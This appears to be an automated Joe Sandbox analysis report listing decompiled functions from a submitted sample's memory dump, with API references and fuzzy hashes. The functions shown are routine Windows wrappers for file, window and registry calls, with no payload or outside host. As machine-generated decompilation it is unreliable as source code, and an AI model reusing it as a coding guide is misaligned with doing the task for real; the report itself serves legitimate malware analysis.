Opcode ID: c586ef2b68a2f3ca709d70337fcdf558dd0630a6df95e79d1a260488e11470b5
Instruction ID: d67aa88dd1cb62bed10c3e7390585935628f2d1eca88a458147ecccec626e26d
Opcode Fuzzy Hash: c586ef2b68a2f3ca709d70337fcdf558dd0630a6df95e79d1a260488e11470b5
Instruction Fuzzy Hash: F4F05230288300BFF3049B72ED26B9A77E8E30AB84F50043BF800C6580E3BD6880C49E

Uniqueness

Uniqueness Score: -1.00%

Function 004409CC Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 004409E3

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction ID: 5849cda3cb4e55621fc81db4894d43a7625008bab2268e4778c0ba098dc558f8
Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
Instruction Fuzzy Hash: 77F06D70505209DBEB0CCF58D0659AF77A1EB68300B2080AFE607A7391D634AE60DA59

Uniqueness

Uniqueness Score: -1.00%

Function 00416538 Relevance: 1.5, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416538(void* __eax, CHAR** __edx) {
				struct HINSTANCE__* _t13;
				struct HWND__* _t23;
				void* _t26;

				_t26 = __eax;
				_t13 =  *0x49a014; // 0x400000
				_t23 = CreateWindowExA(__edx[2],  &(__edx[0x13]),  *__edx, __edx[1], __edx[3], __edx[4], __edx[5], __edx[6], __edx[7], 0, _t13, __edx[8]); // executed
				 *(_t26 + 0xc0) = _t23;
				return _t23;
			}

0x0041653c
0x00416542
0x0041656d
0x00416572
0x0041657a

APIs

CreateWindowExA.USER32 ref: 0041656D

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0059820fa5c2718545f9c1a7ab2c0a69f326d16047ab787ccf5aecd7b7ff452a
Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
Opcode Fuzzy Hash: 0059820fa5c2718545f9c1a7ab2c0a69f326d16047ab787ccf5aecd7b7ff452a
Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0041499C Relevance: 1.5, APIs: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E0041499C(intOrPtr* __eax, void* __edx) {
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v28;
				intOrPtr _v32;
				intOrPtr* _t31;

				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *__eax + 0x2c))();
				_push( *((intOrPtr*)(__eax + 0x2c)) - _v20 +  *_t31);
				_push( *((intOrPtr*)(__eax + 0x30)) - _v16 + _v32);
				return  *((intOrPtr*)( *__eax + 0x4c))();
			}

0x004149a7
0x004149a8
0x004149b3
0x004149c0
0x004149cc
0x004149e0

APIs

KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149D7

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0042CC70 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E0042CC70(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;

				_push(0);
				_push(_t26);
				_push(0x42ccb8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				E0042CB64(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesA(E00403738(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E0042CCBF);
				return E00403400( &_v8);
			}

0x0042cc73
0x0042cc7c
0x0042cc7d
0x0042cc82
0x0042cc85
0x0042cc8d
0x0042cc9b
0x0042cca4
0x0042cca7
0x0042ccaa
0x0042ccb7

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0042CCB8,?,00000001,?,?,00000000,?,0042CD0A,00000000,00451D85,00000000,00451DA6,?,00000000), ref: 0042CC9B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 36984f0c153e8d7ef2d5d47dbcebac8cc2aa99dffbc3dcb1463206b76abeae5a
Instruction ID: b73eb5a154f649d2809be99405b53361cafe154161c2f228d12b6df1401c81d6
Opcode Fuzzy Hash: 36984f0c153e8d7ef2d5d47dbcebac8cc2aa99dffbc3dcb1463206b76abeae5a
Instruction Fuzzy Hash: DBE06571304704BFD701EBA2DC92A5EBBACDB45B14BA14476F40097681D5795E008418

Uniqueness

Uniqueness Score: -1.00%

Function 0044FB24 Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044FB24(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t20;

				_t20 = CreateFileA(E00403738(__edx),  *0x004989E0,  *0x004989EC, 0,  *0x004989FC, 0x80, 0); // executed
				return _t20;
			}

0x0044fb64
0x0044fb6c

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FB64

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6b6c2f6427671c92fc35653d049b776986c206ad1ec0349123f02e2bdec0d0d0
Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
Opcode Fuzzy Hash: 6b6c2f6427671c92fc35653d049b776986c206ad1ec0349123f02e2bdec0d0d0
Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0042E714 Relevance: 1.5, APIs: 1, Instructions: 28
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E714(long __eax, void* __edx) {
				char _v1028;
				long _t6;
				void* _t9;
				intOrPtr _t15;
				void* _t16;

				_t9 = __edx;
				_t6 = FormatMessageA(0x3200, 0, __eax, 0,  &_v1028, 0x400, 0); // executed
				while(_t6 > 0) {
					_t15 =  *((intOrPtr*)(_t16 + _t6 - 1));
					if(_t15 <= 0x20) {
						L1:
						_t6 = _t6 - 1;
						__eflags = _t6;
						continue;
					} else {
						_t19 = _t15 - 0x2e;
						if(_t15 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E004034E0(_t9, _t6, _t16, _t19);
			}

0x0042e71b
0x0042e733
0x0042e73b
0x0042e73f
0x0042e746
0x0042e73a
0x0042e73a
0x0042e73a
0x00000000
0x0042e748
0x0042e748
0x0042e74b
0x00000000
0x00000000
0x0042e74b
0x00000000
0x0042e746
0x0042e75e

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004525D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E733

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 3d4028b123c82e6846fd1d4644c1ebc4dbb36778e7c4a41470860cb2316b366c
Instruction ID: 6d19f9eaba7e0b366cd3630fd3a6006c9e2ab04ede14182dfca9d4daa20a0eaf
Opcode Fuzzy Hash: 3d4028b123c82e6846fd1d4644c1ebc4dbb36778e7c4a41470860cb2316b366c
Instruction Fuzzy Hash: BAE0D86178431115F2251415AC53B7B520E83C0708F94803ABB509D3C2C6AE9D0A425E

Uniqueness

Uniqueness Score: -1.00%

Function 0042DCE4 Relevance: 1.5, APIs: 1, Instructions: 26
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DCE4(void* __eax, char* __ecx, void* __edx, int* _a4, void** _a8, struct _SECURITY_ATTRIBUTES* _a12, int _a16, int _a20, char* _a24, int _a28) {
				long _t15;
				char* _t16;
				void* _t17;
				int _t18;

				_t17 = __edx;
				_t16 = __ecx;
				_t18 = _a16;
				if(__eax == 2) {
					_t18 = _t18 | 0x00000100;
				}
				_t15 = RegCreateKeyExA(_t17, _t16, _a28, _a24, _a20, _t18, _a12, _a8, _a4); // executed
				return _t15;
			}

0x0042dce4
0x0042dce4
0x0042dce8
0x0042dced
0x0042dcef
0x0042dcef
0x0042dd10
0x0042dd17

APIs

RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD10

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: fd09e7af01654870662ecab1a6ae9466cbd6b938ad0164d162c3093db90d5ced
Instruction ID: 7f79a2e4d97a4a645d07b35156213e15a338719dce2f9e63d3d3475997e8d9d9
Opcode Fuzzy Hash: fd09e7af01654870662ecab1a6ae9466cbd6b938ad0164d162c3093db90d5ced
Instruction Fuzzy Hash: 2EE07EB2610119AF9B50DE8DDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4

Uniqueness

Uniqueness Score: -1.00%

Function 00453E14 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00453E14(intOrPtr* __ecx, void* __edx, void* __eflags) {
				intOrPtr _v300;
				intOrPtr _v304;
				void* _t7;
				void* _t8;
				intOrPtr* _t14;
				signed char* _t20;

				_t14 = __ecx;
				_t8 = E00451DC0(_t7, _t20, __edx, __eflags); // executed
				if(_t8 == 0xffffffff) {
					L3:
					 *_t14 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t14 + 4)) = 0;
					return 0;
				}
				FindClose(_t8);
				if(( *_t20 & 0x00000010) != 0) {
					goto L3;
				}
				 *_t14 = _v304;
				 *((intOrPtr*)(_t14 + 4)) = _v300;
				return 1;
			}

0x00453e1b
0x00453e1f
0x00453e27
0x00453e46
0x00453e4a
0x00453e4c
0x00453e4e
0x00000000
0x00453e4e
0x00453e2a
0x00453e33
0x00000000
0x00000000
0x00453e39
0x00453e3f
0x00000000

APIs

FindClose.KERNEL32(00000000,000000FF,0046F5C8,00000000,004703B7,?,00000000,00470400,?,00000000,00470539,?,00000000,?,00000000), ref: 00453E2A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 8dba9651c0f4227cf458ab447ef2502a32ae5847272ef823b760be6dbfb59b22
Instruction ID: 149b646abace05dd99a849fafeb154bdc285a77ddc55ae8383a2978a47a99b95
Opcode Fuzzy Hash: 8dba9651c0f4227cf458ab447ef2502a32ae5847272ef823b760be6dbfb59b22
Instruction Fuzzy Hash: 33E09B709046008BCB14DF3A88C131A76D15F89361F04C96AEC5CCB3D7E63CD5495617

Uniqueness

Uniqueness Score: -1.00%

Function 00414664 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00414664(intOrPtr* __eax, intOrPtr* __edx) {

				_push( *((intOrPtr*)(__edx + 8)) -  *__edx);
				_push( *((intOrPtr*)(__edx + 0xc)) -  *((intOrPtr*)(__edx + 4)));
				return  *((intOrPtr*)( *__eax + 0x4c))();
			}

0x00414671
0x0041467a
0x0041468a

APIs

KiUserCallbackDispatcher.NTDLL(00493C7A,?,00493C9C,?,?,00000000,00493C7A,?,?), ref: 00414683

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00406EF0 Relevance: 1.5, APIs: 1, Instructions: 23
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00406EF0(void* __eax, long __ecx, void* __edx) {
				long _v16;
				int _t4;

				_push(__ecx);
				_t4 = WriteFile(__eax, __edx, __ecx,  &_v16, 0); // executed
				if(_t4 == 0) {
					_v16 = 0xffffffff;
				}
				return _v16;
			}

0x00406ef3
0x00406f04
0x00406f0b
0x00406f0d
0x00406f0d
0x00406f1b

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F04

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 40425b31f0ec640c18ddcb78be3e55b822cb08b158dc6e4ae361f559f5ed5b54
Instruction ID: ed594690980f0b5f749549f30e626d7cb87cd300e09a0a62f3fcac7d4de2953c
Opcode Fuzzy Hash: 40425b31f0ec640c18ddcb78be3e55b822cb08b158dc6e4ae361f559f5ed5b54
Instruction Fuzzy Hash: 5ED05B723081517AD620965B6C44DA76BDCCBC5770F11063EB558C71C1D7309C01C675

Uniqueness

Uniqueness Score: -1.00%

Function 00423634 Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423634(struct HWND__* __eax, int __edx, void* __eflags) {
				int _t3;
				void* _t8;
				int _t10;
				struct HWND__* _t11;

				_t10 = __edx;
				_t11 = __eax;
				_t8 = E004235E0();
				if(_t8 != 0) {
					E00423610(0);
				}
				_t3 = ShowWindow(_t11, _t10); // executed
				if(_t8 != 0) {
					return E00423610(1);
				}
				return _t3;
			}

0x00423637
0x00423639
0x00423640
0x00423644
0x00423648
0x00423648
0x0042364f
0x00423656
0x00000000
0x0042365a
0x00423662

APIs

Part of subcall function 004235E0: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 004235F5

ShowWindow.USER32(00410638,00000009,?,00000000,0041ED8C,00423922,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0042364F

Part of subcall function 00423610: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 0042362C

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: 0d90630d2143e46b18c8a60820b4ab49d7b429b2eaff1a7007acf1abc1a248b7
Instruction ID: 3eb7055ac12859cbecf3d9f3790dfcfbd6e4d25ea45e4068840f1ef7bf75342a
Opcode Fuzzy Hash: 0d90630d2143e46b18c8a60820b4ab49d7b429b2eaff1a7007acf1abc1a248b7
Instruction Fuzzy Hash: 5CD0A7127412303147303EB73845A8B42BC8DD22E7388083BB594DB303E95E8E2160BC

Uniqueness

Uniqueness Score: -1.00%

Function 004242AC Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004242AC(void* __eax, void* __edx, void* __edi) {
				void* __ebx;
				void* __esi;
				int _t10;

				_t11 = __eax;
				if( *((char*)(__eax + 0x7e)) == 0) {
					_t3 = _t11 + 0x6c; // 0x226247c
					return E00403450(_t3, __eax, __edx, __edi, __edx);
				} else {
					_t10 = SetWindowTextA( *(_t11 + 0x20), E00403738(__edx)); // executed
					return _t10;
				}
			}

0x004242b0
0x004242b6
0x004242cc
0x004242d8
0x004242b8
0x004242c4
0x004242cb
0x004242cb

APIs

SetWindowTextA.USER32(?,00000000), ref: 004242C4

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 44f4bf60a6268f42869e724316491ef1b3dbbdca32bc4fa16397d996f2648b9e
Instruction ID: 42294534ecb032ec94791ea22e974ca5a67e3c3b36f223f16e8b1d4149264d5b
Opcode Fuzzy Hash: 44f4bf60a6268f42869e724316491ef1b3dbbdca32bc4fa16397d996f2648b9e
Instruction Fuzzy Hash: FED05EE27011302BCB01BAEE94C4AC677CC8F8825AB1940BBF904EF257C638CE408398

Uniqueness

Uniqueness Score: -1.00%

Function 0042CCC8 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042CCC8(void* __eax) {
				signed char _t5;

				_t5 = GetFileAttributesA(E00403738(__eax)); // executed
				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x0042ccd3
0x0042ccdb
0x0042cce4
0x0042cce5
0x0042cce8
0x0042cce8

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0045092B,00000000), ref: 0042CCD3

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 02c553454b8990baccb1f9e4a7e0e27d7b8954f3fd4444bea42a88bd657d8c57
Instruction ID: 382e2b35769c07ef442e7795505b4c9c9e78e60a45378568269011419efd8913
Opcode Fuzzy Hash: 02c553454b8990baccb1f9e4a7e0e27d7b8954f3fd4444bea42a88bd657d8c57
Instruction Fuzzy Hash: 95C08CE13022005A9A1469BE2CC510F02C8991623A3A41F37F42EE33D3D23E88266018

Uniqueness

Uniqueness Score: -1.00%

Function 00465EC0 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00465EC0(void* __ecx, intOrPtr* __edx) {

				_push( *((intOrPtr*)(__edx + 0x2c)));
				_push( *((intOrPtr*)(__edx + 0x30)) - __ecx);
				return  *((intOrPtr*)( *__edx + 0x4c))();
			}

0x00465ec7
0x00465ecd
0x00465edd

APIs

KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466BAC,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00465ED8

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406EA0 Relevance: 1.5, APIs: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406EA0(void* __eax) {
				void* _t4;

				_t4 = CreateFileA(E00403738(__eax), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
				return _t4;
			}

0x00406ebd
0x00406ec3

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8AC,0040CE58,?,00000000,?), ref: 00406EBD

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
